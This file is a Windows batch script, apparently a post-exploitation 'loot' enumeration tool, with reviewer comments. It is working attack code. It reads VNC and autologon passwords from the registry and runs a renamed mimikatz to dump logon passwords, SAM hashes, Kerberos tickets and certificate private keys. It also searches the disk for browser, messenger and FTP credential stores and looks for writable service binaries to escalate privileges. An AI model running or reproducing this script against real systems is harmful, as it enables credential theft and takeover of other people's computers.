@echo OFF
REM Entry point. Runs each enumeration section in turn, then jumps to :end.
REM The order is load-bearing: CheckOSbitrate sets OSbit, which
REM checkprerequisitefiles uses to look for jollykatz32.exe / jollykatz64.exe,
REM and checkprerequisitefiles sets the flag variables that checkquickwins,
REM getfirewallinformation, dumphashespasseskerberoscerts and
REM findinterestingregistrykeys test later.
REM cleanup only clears those variables; it does not delete the files the run
REM writes into the current directory - registrydump.txt, dirlisting.txt,
REM serviceexes.txt, systeminfo.txt - so collect and remove them yourself.
call:credits
call:CheckOSbitrate
call:CheckOSversion
call:checkprerequisitefiles

call:checkquickwins
call:getfirewallinformation
call:getcomputerinformation
call:dumphashespasseskerberoscerts
call:findinterestingfiles
call:findinterestingregistrykeys
call:findpasswords
call:checkweakpermissions
call:cleanup
goto end
  17.  
  18. :credits
  19. echo.----------------------------------------------------
  20. echo.Author: Jollyfrogs, Brisbane QLD
  21. echo.A root loot script I used to learn batch techniquesP, needs TLC
  22. echo.----------------------------------------------------
  23. echo.
  24. goto:eof
  25.  
  26. :CheckOSbitrate
  27. IF DEFINED ProgramFiles(x86) (set OSbit=64) else (set OSbit=32)
  28. goto:eof
  29.  
  30. :checkprerequisitefiles
  31. REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE
  32. echo ====================================================================
  33. echo ====================== IGNORE THESE ERRORS =========================
  34. dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL
  35. IF %ERRORLEVEL% == 0 set jollykatz=1
  36. for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a
  37. for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a
  38.  
  39. REM
  40. REM check registry for the following registry entries:
  41. REM
  42. reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
  43. IF %ERRORLEVEL% == 0 (
  44.     reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
  45.     IF %ERRORLEVEL% == 0 (set alwaysinstallelevated=1)
  46. )
  47. reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL
  48. IF %ERRORLEVEL% == 0 (set IE6found=1)
  49. reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL
  50. IF %ERRORLEVEL% == 0 (set IE7found=1)
  51. reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL
  52. IF %ERRORLEVEL% == 0 (set AIM6found=1)
  53. reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL
  54. IF %ERRORLEVEL% == 0 (set AIMPROfound=1)
  55. reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL
  56. IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1)
  57. reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL
  58. IF %ERRORLEVEL% == 0 (set BIGANTfound=1)
  59. reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL
  60. IF %ERRORLEVEL% == 0 (set CAMFROGfound=1)
  61. reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL
  62. IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1)
  63. reg query "HKCU\SOFTWARE\IMVU" 1>NUL
  64. IF %ERRORLEVEL% == 0 (set IMVUfound=1)
  65. reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL
  66. IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1)
  67. reg query "HKCU\SOFTWARE\Paltalk" 1>NUL
  68. IF %ERRORLEVEL% == 0 (set PALTALKfound=1)
  69. reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL
  70. IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1)
  71. reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL
  72. IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1)
  73. reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL
  74. IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1)
  75. reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles" 1>NUL
  76. IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1)
  77. reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles" 1>NUL
  78. IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1)
  79. reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts" 1>NUL
  80. IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1)
  81. reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL
  82. IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1)
  83. reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL
  84. IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1)
  85. reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL
  86. IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1)
  87. reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL
  88. IF %ERRORLEVEL% == 0 (set IDMfound=1)
  89. reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL
  90. IF %ERRORLEVEL% == 0 (set PICASAfound=1)
  91. reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL
  92. IF %ERRORLEVEL% == 0 (set realvncpassfound=1)
  93. reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL
  94. IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1)
  95. reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL
  96. IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1)
  97. reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL
  98. IF %ERRORLEVEL% == 0 (set tigervncpassfound=1)
  99. reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL
  100. IF %ERRORLEVEL% == 0 (set vnc3passfound1=1)
  101. reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
  102. IF %ERRORLEVEL% == 0 (set vnc3passfound2=1)
  103. reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
  104. IF %ERRORLEVEL% == 0 (set vnc3passfound3=1)
  105. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL
  106. IF %ERRORLEVEL% == 0 (
  107.     For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b
  108.     REM we check if the registry key is not null
  109.     IF NOT [%defaultloginpass%] == [] set winautologinpassfound=1
  110.     set defaultloginpass=
  111. )
  112. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL
  113. IF %ERRORLEVEL% == 0 (set winautologinuserfound=1)
  114. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL
  115. IF %ERRORLEVEL% == 0 (set winautologindomainfound=1)
  116. REM
  117. REM
  118. echo ====================== IGNORE THESE ERRORS =========================
  119. echo ====================================================================
  120. echo.
  121. goto:eof
  122.  
  123. :CheckOSVersion
  124. @echo off
  125. ver | find "2003" > nul
  126. if %ERRORLEVEL% == 0 goto ver_2003
  127. ver | find "XP" > nul
  128. if %ERRORLEVEL% == 0 goto ver_xp
  129. ver | find "2000" > nul
  130. if %ERRORLEVEL% == 0 goto ver_2000
  131. ver | find "NT" > nul
  132. if %ERRORLEVEL% == 0 goto ver_nt
  133. if not exist %SystemRoot%\system32\systeminfo.exe goto versioncheckwarnthenexit
  134. systeminfo | find "OS Name" > %TEMP%\osname.txt
  135. FOR /F "usebackq delims=: tokens=2" %%i IN (%TEMP%\osname.txt) DO set vers=%%i
  136. echo %vers% | find "Windows 7" > nul
  137. if %ERRORLEVEL% == 0 goto ver_7
  138. echo %vers% | find "Windows Server 2008" > nul
  139. if %ERRORLEVEL% == 0 goto ver_2008
  140. echo %vers% | find "Windows Vista" > nul
  141. if %ERRORLEVEL% == 0 goto ver_vista
  142. goto warnthenexit
  143. :ver_7
  144. :Run Windows 7 specific commands here.
  145. set OSVersion=WIN7
  146. goto versioncheckexit
  147. :ver_2008
  148. :Run Windows Server 2008 specific commands here.
  149. set OSVersion=WIN2008
  150. goto versioncheckexit
  151. :ver_vista
  152. :Run Windows Vista specific commands here.
  153. set OSVersion=WINVISTA
  154. goto versioncheckexit
  155. :ver_2003
  156. :Run Windows Server 2003 specific commands here.
  157. set OSVersion=WIN2003
  158. goto versioncheckexit
  159. :ver_xp
  160. :Run Windows XP specific commands here.
  161. set OSVersion=WINXP
  162. goto versioncheckexit
  163. :ver_2000
  164. :Run Windows 2000 specific commands here.
  165. set OSVersion=WIN2000
  166. goto versioncheckexit
  167. :ver_nt
  168. :Run Windows NT specific commands here.
  169. set OSVersion=WINNT
  170. goto versioncheckexit
  171. :versioncheckwarnthenexit
  172. set OSVersion=UNDETERMINED
  173. goto:versioncheckexit
  174. :versioncheckexit
  175. goto:eof
  176.  
  177. :checkquickwins
  178.     systeminfo > systeminfo.txt
  179.     REM === Generic tests across all Windows versions here
  180.     IF DEFINED alwaysinstallelevated (
  181.         echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! ****
  182.         set alwaysinstallelevated=
  183.         echo.
  184.     )
  185.     IF DEFINED realvncpassfound (
  186.         echo **** !!! REALVNC PASS FOUND !!! ****
  187.         reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password"
  188.         echo ************************************
  189.         set realvncpassfound=
  190.         echo.
  191.     )
  192.     IF DEFINED tightvncpassfound1 (
  193.         echo **** !!! TIGHTVNC PASS FOUND !!! ****
  194.         reg query HKLM\Software\TightVNC\Server /v Password | Find "Password"
  195.         echo *************************************
  196.         set tightvncpassfound1=
  197.         echo.
  198.     )
  199.     IF DEFINED tightvncpassfound2 (
  200.         echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! ****
  201.         reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly"
  202.         echo **********************************************
  203.         set tightvncpassfound2=
  204.         echo.
  205.     )
  206.     IF DEFINED tigervncpassfound (
  207.         echo **** !!! TIGERVNC PASS FOUND !!! ****
  208.         reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password"
  209.         echo *************************************
  210.         set tigervncpassfound=
  211.         echo.
  212.     )
  213.     IF DEFINED vnc3passfound1 (
  214.         echo **** !!! VNC3 PASS FOUND !!! ****
  215.         reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password"
  216.         echo *********************************
  217.         set vnc3passfound1=
  218.         echo.
  219.     )
  220.     IF DEFINED vnc3passfound2 (
  221.         echo **** !!! VNC3 PASS FOUND !!! ****
  222.         reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password"
  223.         echo *********************************
  224.         set vnc3passfound2=
  225.         echo.
  226.     )
  227.     IF DEFINED vnc3passfound3 (
  228.         echo **** !!! VNC3 PASS FOUND !!! ****
  229.         reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password"
  230.         echo *********************************
  231.         set vnc3passfound3=
  232.         echo.
  233.     )
  234.     IF DEFINED winautologinpassfound (
  235.         echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! ****
  236.         reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword"
  237.         echo **********************************************
  238.  
  239.         IF DEFINED Winautologinuserfound (
  240.             reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername"
  241.             set winautologinuserfound=
  242.         )
  243.  
  244.         IF DEFINED winautologindomainfound (
  245.             reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname"
  246.             set winautologindomainfound=
  247.         )
  248.  
  249.         set winautologinpassfound=
  250.     )
  251. goto:eof
  252.     if %OSVersion%==WINXP (
  253.         REM Maybe we can do something nice with this, haven't found a really good use yet other than it does work, too many KB's and interdependencies on KB patches
  254.         REM for /f "tokens=1 delims=" %%a in ('type systeminfo.txt ^| findstr /C:"KB147222"') do set MYKB=%%a
  255.         REM if NOT DEFINED MYKB echo == VULNERABLE TO KBasfjsdfj
  256.         REM set MYKB=
  257.         REM echo.
  258.     )
  259. goto:eof
  260.  
  261. :getfirewallinformation
  262. echo.
  263. IF DEFINED netshfirewall (
  264.         echo.
  265.         echo.Firewall Status
  266.         echo.---------------
  267.         netsh firewall show state
  268.         echo.
  269.         echo.
  270.         echo.Firewall configuration details
  271.         echo.------------------------------
  272.         echo.
  273.         netsh firewall show config
  274.         echo.
  275.     ) ELSE (
  276.         echo === NOTE: The netsh firewall command was not found, skipping checks ===
  277.     )
  278. echo.
  279. goto:eof
  280.  
  281. :getcomputerinformation
  282. echo.
  283. echo.This computer is running %OSbit%-bit Windows
  284. echo.
  285. IF DEFINED whoami (
  286.     echo.
  287.     echo.Are we running an elevated command prompt?
  288.     echo.------------------------------------------
  289.     for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a
  290.         IF DEFINED runningelevatedprompt (
  291.                 echo YES, we ARE!
  292.             ) ELSE (
  293.                 echo Sadly, no...
  294.             )
  295.         echo.
  296.         echo.User Groups
  297.         echo.-----------
  298.         whoami /groups
  299.         echo.
  300.     ) ELSE (
  301.         echo === NOTE: The whoami command was not found, skipping checks ===
  302.     )
  303. echo.
  304. echo.User Accounts
  305. echo.-------------
  306. net users
  307. echo.
  308. echo.Systeminfo
  309. echo.----------
  310. systeminfo
  311. echo.
  312. echo.Netstat -ano
  313. echo.------------
  314. netstat -ano
  315. echo.
  316. echo.Scheduled tasks
  317. echo.---------------
  318. schtasks /query /fo LIST /v
  319. echo.
  320. echo.Task to service mapping
  321. echo.-----------------------
  322. tasklist /SVC
  323. echo.
  324. echo.Network settings
  325. echo.----------------
  326. ipconfig /all
  327. echo.
  328. echo.Running windows services
  329. echo.------------------------
  330. net start
  331. echo.
  332. echo.Listing Windows drivers
  333. echo.-----------------------
  334. DRIVERQUERY
  335. echo.
  336. echo.Dumping Windows registry to registrydump.txt
  337. echo.--------------------------------------------
  338. reg query HKLM /s > registrydump.txt
  339. reg query HKCU /s >> registrydump.txt
  340. echo.
  341. echo.Environment variables
  342. echo.---------------------
  343. set
  344. echo.
  345. echo.Group Policy
  346. echo.------------
  347. gpresult /R 1>2>NUL
  348. IF %ERRORLEVEL% == 1 (
  349.     REM WINXP
  350.     gpresult
  351. ) ELSE (
  352.     REM WIN7
  353.     gpresult /R
  354. )
  355. echo.
  356. REM ** ALEX TO ADD CREDENUMERATE **
  357. goto:eof
  358.  
:dumphashespasseskerberoscerts
REM Drive jollykatz%OSbit%.exe to dump logon secrets, the SAM, Kerberos
REM tickets and private keys from the CAPI/CNG certificate stores. The
REM module::command syntax below suggests a renamed mimikatz build - confirm
REM which binary you actually drop. Skipped entirely when
REM checkprerequisitefiles did not find the file.
REM NOTE(review): every call starts with privilege::debug and most also run
REM token::elevate, so this presumably only yields output from an elevated
REM prompt. The /export commands write the exported tickets and certificates
REM as files into the current directory and nothing in this script removes
REM them afterwards - treat the working directory as loot. Renaming the
REM binary does not change what it does; expect this to be the noisiest part
REM of the run for any endpoint protection.
echo.Hashes, passwords, kerberos tickets and certificates
echo.-----------------
IF NOT DEFINED jollykatz echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks ===
IF NOT DEFINED jollykatz goto:eof
echo.
echo.sekurlsa::logonPasswords full
echo.------
jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
echo.
echo.lsadump::sam
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
echo.
echo.sekurlsa::tickets /export
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
echo.
REM The four certificate runs differ only in the system store they read.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_CURRENT_USER)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_CURRENT_USER /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_USERS)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_USERS /store:my /export" "exit"
echo.
goto:eof
  394.  
  395. :findinterestingfiles
  396. echo.Interesting files and directories
  397. echo.---------------------------------
  398. dir C:\* /a/s/b > dirlisting.txt
  399. type dirlisting.txt | findstr /I \.*proof[.]txt$
  400. type dirlisting.txt | findstr /I \.*network-secret[.]txt$
  401. type dirlisting.txt | findstr /I \.*ssh.*[.]ini$
  402. type dirlisting.txt | findstr /I \.*ultravnc[.]ini$
  403. type dirlisting.txt | findstr /I \.*vnc[.]ini$
  404. type dirlisting.txt | findstr /I \.*bthpan[.]sys$
  405. type dirlisting.txt | findstr /I \.*\\repair$
  406. type dirlisting.txt | findstr /I \.*passw*. | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$
  407. type dirlisting.txt | findstr /I \.*[.]vnc$
  408. type dirlisting.txt | findstr /I \.*groups[.]xml$
  409. type dirlisting.txt | findstr /I \.*printers[.]xml$
  410. type dirlisting.txt | findstr /I \.*drives[.]xml$
  411. type dirlisting.txt | findstr /I \.*scheduledtasks[.]xml$
  412. type dirlisting.txt | findstr /I \.*services[.]xml$
  413. type dirlisting.txt | findstr /I \.*datasources[.]xml$
  414. type dirlisting.txt | findstr /I \.*.rsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.rat$
  415. type dirlisting.txt | findstr /I \.*.dsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$
  416. type dirlisting.txt | findstr /I \.*[.]dbx$
  417. type dirlisting.txt | findstr /I \.*.account.*.$ | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$
  418. type dirlisting.txt | findstr /I \.*ntds[.].*$
  419. type dirlisting.txt | findstr /I \.*hiberfil[.].*$
  420. type dirlisting.txt | findstr /I \.*boot[.]ini$
  421. type dirlisting.txt | findstr /I \.*win[.]ini$
  422. type dirlisting.txt | findstr /I \.*.\\config\\RegBack
  423. type dirlisting.txt | findstr /I \.*.\\CCM\\logs
  424. type dirlisting.txt | findstr /I \.*.\\iis.[.]log$
  425. type dirlisting.txt | findstr /I \.*.\\Content.IE.\\index.dat$
  426. type dirlisting.txt | findstr /I \.*.\\inetpub\\logs\\LogFiles
  427. type dirlisting.txt | findstr /I \.*.\\httperr\\httpe.*.[.]log$
  428. type dirlisting.txt | findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$
  429. type dirlisting.txt | findstr /I \.*.\\Panther\\ | findstr /VI \.*.Resources\\Themes\\.*.
  430. type dirlisting.txt | findstr /I \.*.syspre.*,[.]...$
  431. type dirlisting.txt | findstr /I \.*.unatten.*.[.]txt$
  432. type dirlisting.txt | findstr /I \.*.unatten.*.[.]xml$
  433. type dirlisting.txt | findstr /I \.*Login.Data$
  434. type dirlisting.txt | findstr /I \.*Web.Data$
  435. type dirlisting.txt | findstr /I \.*Credentials.Store$
  436. type dirlisting.txt | findstr /I \.*Credential.Store$
  437. type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
  438. REM Avant Browser:
  439. type dirlisting.txt | findstr /I \.*forms[.]dat[.]vdt$
  440. type dirlisting.txt | findstr /I \.*default\\formdata\\forms[.]dat$
  441. REM Comodo Dragon
  442. type dirlisting.txt | findstr /I \.*Dragon\\User.Data\\Default.*
  443. REM CoolNovo
  444. type dirlisting.txt | findstr /I \.*ChromePlus\\User.Data\\Default.*
  445. REM Firefox
  446. type dirlisting.txt | findstr /I \.*Firefox\\Profiles\\.*[.]default$
  447. type dirlisting.txt | findstr /I \.*key3[.]db$
  448. REM Flock Browser
  449. type dirlisting.txt | findstr /I \.*Flock\\User.Data\\Default.*
  450. REM Google Chrome
  451. type dirlisting.txt | findstr /I \.*Chrome\\User.Data\\Default.*
  452. type dirlisting.txt | findstr /I \.*Chrome.SXS\\User.Data\\Default.*
  453. REM Internet Explorer
  454. type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
  455. REM Maxthon
  456. type dirlisting.txt | findstr /I \.*MagicFill.*
  457. type dirlisting.txt | findstr /I \.*MagicFill2[.]dat$
  458. REM Opera
  459. type dirlisting.txt | findstr /I \.*Wand[.]dat$
  460. REM Safari
  461. type dirlisting.txt | findstr /I \.*keychain[.]plist$
  462. REM SeaMonkey
  463. type dirlisting.txt | findstr /I \.*signons[.]sqlite$
  464. REM AIM
  465. type dirlisting.txt | findstr /I \.*aimx[.]bin$
  466. REM Digsby
  467. type dirlisting.txt | findstr /I \.*logininfo[.]yaml$
  468. type dirlisting.txt | findstr /I \.*digsby[.]dat$
  469. REM Meebo Notifier
  470. type dirlisting.txt | findstr /I \.*MeeboAccounts[.]txt$
  471. REM Miranda IM
  472. type dirlisting.txt | findstr /I \.*Miranda\\.*[.]dat$
  473. REM MySpace IM
  474. type dirlisting.txt | findstr /I \.*MySpace\\IM\\users[.]txt$
  475. REM Pidgin
  476. type dirlisting.txt | findstr /I \.*Accounts[.]xml$
  477. REM Skype
  478. type dirlisting.txt | findstr /I \.*Skype.*config[.]xml$
  479. REM Tencent QQ
  480. type dirlisting.txt | findstr /I \.*Registry[.]db$
  481. REM Trillian
  482. type dirlisting.txt | findstr /I \.*accounts[.]ini$
  483. REM XFire
  484. type dirlisting.txt | findstr /I \.*XfireUser[.]ini$
  485. REM Foxmail
  486. type dirlisting.txt | findstr /I \.*Account[.]stg$
  487. type dirlisting.txt | findstr /I \.*Accounts[.]tdat$
  488. REM ThunderBird
  489. type dirlisting.txt | findstr /I \.*signons[.]sqlite$
  490. REM Windows Live Mail
  491. type dirlisting.txt | findstr /I \.*[.]oeaccount$
  492. REM FileZilla
  493. type dirlisting.txt | findstr /I \.*recentservers[.]xml$
  494. REM FlashFXP
  495. type dirlisting.txt | findstr /I \.*Sites[.]dat$
  496. REM FTPCommander
  497. type dirlisting.txt | findstr /I \.*Ftplist[.]txt$
  498. REM SmartFTP
  499. type dirlisting.txt | findstr /I \.*SmartFTP.*[.]xml$
  500. REM WS_FTP
  501. type dirlisting.txt | findstr /I \.*ws_ftp[.]ini$
  502. REM Heroes of Newerth
  503. type dirlisting.txt | findstr /I \.*login[.]cfg$
  504. REM JDownloader
  505. type dirlisting.txt | findstr /I \.*JDownloader.*
  506. type dirlisting.txt | findstr /I \.*database[.]script$
  507. type dirlisting.txt | findstr /I \.*accounts[.]ejs$
  508. REM OrbitDownloader
  509. type dirlisting.txt | findstr /I \.*sitelogin[.]dat$
  510. REM Seesmic
  511. type dirlisting.txt | findstr /I \.*data[.]db$
  512. REM SuperPutty
  513. type dirlisting.txt | findstr /I \.*sessions[.]xml$
  514. REM TweetDeck
  515. type dirlisting.txt | findstr /I \.*TweetDeck.*
  516. type dirlisting.txt | findstr /I \.*[.]localstorage$
  517. echo.
  518. goto:eof
  519.  
  520. :findinterestingregistrykeys
  521. REM Source: securityxploded dot com slash passwordsecrets dot php
  522. IF EXIST AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords")
  523. IF EXIST AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO")
  524. IF EXIST IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage")
  525. IF EXIST IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2")
  526. IF EXIST BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger")
  527. IF EXIST BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting")
  528. IF EXIST CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client")
  529. IF EXIST GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts")
  530. IF EXIST IMVUfound (reg query "HKCU\SOFTWARE\IMVU")
  531. IF EXIST NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application")
  532. IF EXIST PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk")
  533. IF EXIST YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager")
  534. IF EXIST INCREDIMAIL (reg query "HKCU\SOFTWARE\IncrediMail")
  535. IF EXIST OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook")
  536. IF EXIST OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles")
  537. IF EXIST OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles")
  538. IF EXIST OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts")
  539. IF EXIST OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts")
  540. IF EXIST DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites")
  541. IF EXIST GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail")
  542. IF EXIST IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords")
  543. IF EXIST PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa")
  544. REM
  545.  
  546. :findpasswords
  547. echo.Searching for passwords (this can take a while)
  548. echo.-----------------------------------------------
  549. findstr /si pwd= *.xml *.ini *.txt
  550. findstr /si password= *.xml *.ini *.txt
  551. findstr /si pass= *.xml *.ini *.txt
  552. goto:eof
  553.  
  554. :checkweakpermissions
  555. echo.Searching for weak service permissions (this can take a while)
  556. echo.--------------------------------------------------------------
  557. if exist serviceexes.txt del serviceexes.txt
  558. if exist dirlisting.txt del dirlisting.txt
  559. dir \ /a/s/b > dirlisting.txt
  560. for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt
  561. REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo
  562. REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call)
  563. REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead
  564. REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on
  565.  
  566. for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Users:"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
  567. for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Everyone"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
  568.  
  569. echo.Files and folder with Read-Write access
  570. echo.---------------------------------------
  571. dir accesschk.exe /a/s/b 1>2>NUL
  572. IF %ERRORLEVEL% == 0 (
  573.     echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks ===
  574.     goto:eof
  575. )
  576.  
  577.     accesschk.exe /accepteula 1>2>NUL
  578.    
  579.     accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
